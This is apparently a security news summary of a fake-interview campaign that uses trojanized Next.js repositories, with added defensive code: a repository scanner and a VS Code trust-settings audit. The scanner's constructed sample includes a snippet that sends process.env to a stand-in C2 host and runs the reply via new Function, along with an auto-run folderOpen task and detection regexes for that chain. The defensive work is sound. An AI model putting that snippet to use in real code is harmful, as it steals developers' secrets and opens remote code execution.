A coordinated campaign is targeting software developers through fake job interviews and technical assessments that contain malicious Next.js repositories. Once cloned and executed, the code enables remote code execution (RCE), data exfiltration, and deployment of additional backdoors.

Attackers are creating fake repositories that appear to be legitimate Next.js projects used in coding tests. Developers receive links as part of supposed technical interviews. After cloning the repository and launching the project, malicious JavaScript executes automatically. The main goal is to achieve remote code execution (RCE), exfiltrate sensitive information, and deploy persistent payloads.
Microsoft Defender identified multiple repositories sharing identical loader logic, naming conventions, and staging infrastructure, indicating a coordinated effort.
Attackers embedded multiple execution triggers:
1. VS Code Trigger
A .vscode/tasks.json file configured with runOn: "folderOpen" executes a Node script when the folder is opened and trusted.
2. Dev Server Trigger
Running npm run dev activates a trojanized asset that decodes a hidden URL, fetches a loader from a remote server, and executes it in memory.
3. Backend Startup Trigger
On backend start, a module decodes a base64 endpoint from .env, sends process.env to the attacker, receives JavaScript in response, and executes it via new Function().
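The three triggers above all leave static traces in the cloned working tree, so a developer (or a CI gate in front of the developer) can check a repository before opening it in an editor or running any script. The scanner below is an added example written for this summary; it is not code from the Microsoft report or from any repository it describes. It looks for an auto-run VS Code task (`runOptions.runOn: "folderOpen"`), npm lifecycle hooks that run implicitly, `.env` values that are base64 and decode to a URL, and source files that combine base64 decoding, `JSON.stringify(process.env)` and `new Function`/`eval`. `SAMPLE_REPO` is a constructed in-memory working tree (with `.invalid` hostnames) so the example runs offline; the rule names, the `LIFECYCLE` list and the regexes are this example's own choices, not indicators published with the report.

```javascript
// Added example: static scan of a cloned repo for the execution triggers
// described in the text. Not code from the report or the repositories.

// Constructed sample working tree, keyed by relative path -> contents.
const SAMPLE_REPO = {
  '.vscode/tasks.json': JSON.stringify({
    version: '2.0.0',
    tasks: [{
      label: 'setup',
      type: 'shell',
      command: 'node scripts/setup.js',
      runOptions: { runOn: 'folderOpen' }, // runs once the folder is opened and trusted
    }],
  }),
  'package.json': JSON.stringify({
    scripts: { predev: 'node scripts/setup.js', dev: 'next dev', build: 'next build' },
  }),
  // Second key is a base64-encoded URL (constructed), like the backend trigger's endpoint.
  '.env':
    'NEXT_PUBLIC_API=https://app.example.invalid/api\n' +
    'ANALYTICS_ENDPOINT=' + Buffer.from('https://c2.example.invalid/beacon').toString('base64') + '\n',
  'lib/telemetry.js':
    'const u = Buffer.from(process.env.ANALYTICS_ENDPOINT, "base64").toString();\n' +
    'fetch(u, { method: "POST", body: JSON.stringify(process.env) })\n' +
    '  .then(r => r.text()).then(js => new Function(js)());\n',
};

// Rule 1: tasks in .vscode/tasks.json that fire automatically on folder open.
function scanTasksJson(text) {
  let doc;
  try {
    doc = JSON.parse(text.replace(/^\s*\/\/.*$/gm, '')); // tasks.json may carry // comments
  } catch {
    return [{ rule: 'tasks-unparseable', detail: '.vscode/tasks.json could not be parsed; review by hand' }];
  }
  return (doc.tasks || [])
    .filter(t => t.runOptions && t.runOptions.runOn === 'folderOpen')
    .map(t => ({ rule: 'auto-run-task', detail: `task "${t.label}" runs on folderOpen: ${t.command}` }));
}

// Rule 2: npm lifecycle hooks that run implicitly around `npm install` / `npm run dev`.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare', 'predev', 'postdev'];
function scanPackageJson(text) {
  let doc;
  try { doc = JSON.parse(text); } catch { return []; }
  return LIFECYCLE.filter(k => doc.scripts && doc.scripts[k])
    .map(k => ({ rule: 'lifecycle-hook', detail: `scripts.${k} = ${doc.scripts[k]}` }));
}

// Rule 3: .env values that are base64 and decode to an http(s) URL.
function scanEnv(text) {
  const findings = [];
  for (const line of text.split('\n')) {
    const m = line.match(/^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*"?([A-Za-z0-9+/]{16,}={0,2})"?\s*$/);
    if (!m) continue;
    const decoded = Buffer.from(m[2], 'base64').toString('utf8');
    if (/^https?:\/\/\S+$/.test(decoded)) {
      findings.push({ rule: 'env-base64-url', detail: `${m[1]} decodes to ${decoded}` });
    }
  }
  return findings;
}

// Rule 4: source patterns matching the described decode -> exfiltrate -> execute chain.
const SOURCE_PATTERNS = [
  { rule: 'dynamic-code-exec', re: /\bnew\s+Function\s*\(|\beval\s*\(/ },
  { rule: 'env-exfil', re: /JSON\.stringify\s*\(\s*process\.env\s*\)/ },
  { rule: 'base64-decode', re: /Buffer\.from\s*\([^)]*,\s*['"]base64['"]\s*\)|\batob\s*\(/ },
];
function scanSource(file, text) {
  return SOURCE_PATTERNS.filter(p => p.re.test(text))
    .map(p => ({ rule: p.rule, detail: `${file}: ${p.rule}` }));
}

// Dispatch each file to the matching rule; returns every finding for a {path: contents} map.
function scanRepo(files) {
  const findings = [];
  for (const [file, text] of Object.entries(files)) {
    if (file === '.vscode/tasks.json') findings.push(...scanTasksJson(text));
    else if (file === 'package.json') findings.push(...scanPackageJson(text));
    else if (file === '.env' || file.startsWith('.env.')) findings.push(...scanEnv(text));
    else if (/\.(m|c)?[jt]sx?$/.test(file)) findings.push(...scanSource(file, text));
  }
  return findings;
}

// Read a real clone into the same {path: contents} shape (skips node_modules and .git).
function readTree(root, rel = '') {
  const fs = require('fs'), path = require('path');
  const out = {};
  for (const ent of fs.readdirSync(path.join(root, rel), { withFileTypes: true })) {
    if (ent.name === 'node_modules' || ent.name === '.git') continue;
    const r = rel ? `${rel}/${ent.name}` : ent.name;
    if (ent.isDirectory()) Object.assign(out, readTree(root, r));
    else out[r] = fs.readFileSync(path.join(root, r), 'utf8');
  }
  return out;
}

// Usage: `node scan.js /path/to/clone`; with no argument the constructed sample is scanned.
if (typeof require !== 'undefined' && require.main === module) {
  const target = process.argv[2] ? readTree(process.argv[2]) : SAMPLE_REPO;
  for (const f of scanRepo(target)) console.log(`[${f.rule}] ${f.detail}`);
}
```

A hit on any single rule is a reason to read the file, not proof of compromise: `predev` hooks and `atob` have legitimate uses. The combination the text describes (a base64 endpoint in `.env`, `process.env` serialized into a request, and the response passed to `new Function`) is what should stop a developer from running `npm run dev` until the project has been reviewed. The scan is static, so it must run before the folder is trusted in VS Code; once trusted, the `folderOpen` task has already fired.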

The loader profiles the host and registers with a command-and-control (C2) server, polling it at fixed intervals.
The backdoor connects to a separate C2 server, retrieves tasks, executes arbitrary JavaScript in memory, and supports:
- file enumeration
- directory browsing
- staged data exfiltration
- process tracking
All of this is performed without writing malicious files to disk.
Microsoft did not disclose details about the attacker or the campaign’s scope. However, structural similarities across repositories indicate a coordinated operation.
Developers should treat standard workflows as high-risk attack surfaces.
Recommended mitigations include:
- Enforcing VS Code Workspace Trust / Restricted Mode
- Applying Attack Surface Reduction (ASR) rules
- Monitoring risky sign-ins via Entra ID Protection
- Minimizing secrets stored on developer endpoints
- Using short-lived tokens with least privilege
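The first mitigation, Workspace Trust, is only as strong as the settings behind it: the `folderOpen` trigger described above depends on the folder being trusted and on automatic tasks being allowed. The audit below is an added example written for this summary, not a Microsoft-published baseline. The four setting names are real VS Code settings; the target values in `HARDENED` and the defaults in `DEFAULTS` are this example's assumptions about a restrictive posture, and `WEAK_SETTINGS` is a constructed sample profile.

```javascript
// Added example: compare a VS Code settings.json object against a restrictive
// Workspace Trust posture. Target values are this example's assumptions.
const HARDENED = {
  'security.workspace.trust.enabled': true,            // Restricted Mode must be available
  'security.workspace.trust.startupPrompt': 'always',  // prompt on every untrusted open, not just once
  'security.workspace.trust.untrustedFiles': 'prompt', // never silently trust loose files
  'task.allowAutomaticTasks': 'off',                   // folderOpen tasks need explicit permission
};

// Values VS Code applies when the key is absent (assumed defaults for this example).
const DEFAULTS = {
  'security.workspace.trust.enabled': true,
  'security.workspace.trust.startupPrompt': 'once',
  'security.workspace.trust.untrustedFiles': 'prompt',
  'task.allowAutomaticTasks': 'on',
};

// Returns one finding per setting whose effective value differs from HARDENED.
function auditVsCodeSettings(settings) {
  return Object.entries(HARDENED)
    .map(([key, want]) => ({
      setting: key,
      current: key in settings ? settings[key] : DEFAULTS[key],
      explicit: key in settings,
      recommended: want,
    }))
    .filter(f => f.current !== f.recommended);
}

// Constructed sample: a profile that disabled trust to stop the prompts.
const WEAK_SETTINGS = {
  'editor.fontSize': 14,
  'security.workspace.trust.enabled': false,
  'security.workspace.trust.startupPrompt': 'never',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditVsCodeSettings(WEAK_SETTINGS)) {
    const src = f.explicit ? 'set' : 'default';
    console.log(`${f.setting}: ${f.current} (${src}) -> recommended ${f.recommended}`);
  }
}
```

Note that a profile with no trust settings at all still produces findings for the startup prompt and automatic tasks, because the editor's defaults favour convenience; enforcing the posture therefore means pushing these values, not merely leaving them untouched.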
This campaign highlights a shift: attackers now target developers directly through everyday workflows. Cloning repositories, running npm scripts, and opening projects in VS Code are now potential infection vectors.
Developer environments have become a new cyber battleground.